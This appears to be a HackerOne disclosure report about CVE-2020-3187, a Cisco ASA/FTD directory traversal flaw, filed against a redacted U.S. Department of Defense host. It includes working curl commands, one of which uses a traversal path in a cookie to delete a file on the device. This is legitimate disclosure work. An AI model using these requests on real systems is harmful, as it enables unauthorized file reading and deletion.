Lucene search

K
hackeroneGhostxsecH1:1555025
HistoryApr 29, 2022 - 10:55 p.m.

U.S. Dept Of Defense: CVE-2020-3187 - Unauthenticated Arbitrary File Deletion

2022-04-2922:55:24
ghostxsec
hackerone.com
35

0.973 High

EPSS

Percentile

99.9%

A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences.

The IP has a SSL certificate pointing to โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ
curl -kv https://โ–ˆโ–ˆโ–ˆ

output:

Server certificate:
โ–ˆโ–ˆโ–ˆโ–ˆ

Impact

An exploit could allow the attacker to view or delete arbitrary files on the targeted system. When the device is reloaded after exploitation of this vulnerability, any files that were deleted are restored. The attacker can only view and delete files within the web services file system. This file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability can not be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. Reloading the affected device will restore all files within the web services file system.

System Host(s)

โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ

Affected Product(s) and Version(s)

CVE Numbers

CVE-2020-3187

Steps to Reproduce

1.First I performed a curl request to validate that /session_password.html gave a 200 response.
curl -k -s -i https://โ–ˆโ–ˆโ–ˆโ–ˆ+CSCOE+/session_password.html
2.Example to delete logo file โ€œ/+CSCOU+/csco_logo.gifโ€.
curl -k -H โ€œCookie: token=โ€ฆ/+CSCOU+/csco_logo.gifโ€ https://โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ+CSCOE+/session_password.html

NOTE: No destructive behavior was performed on target, the above command will remove csco_logo.gif and can be restored on reboot of the device

Suggested Mitigation/Remediation Actions

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43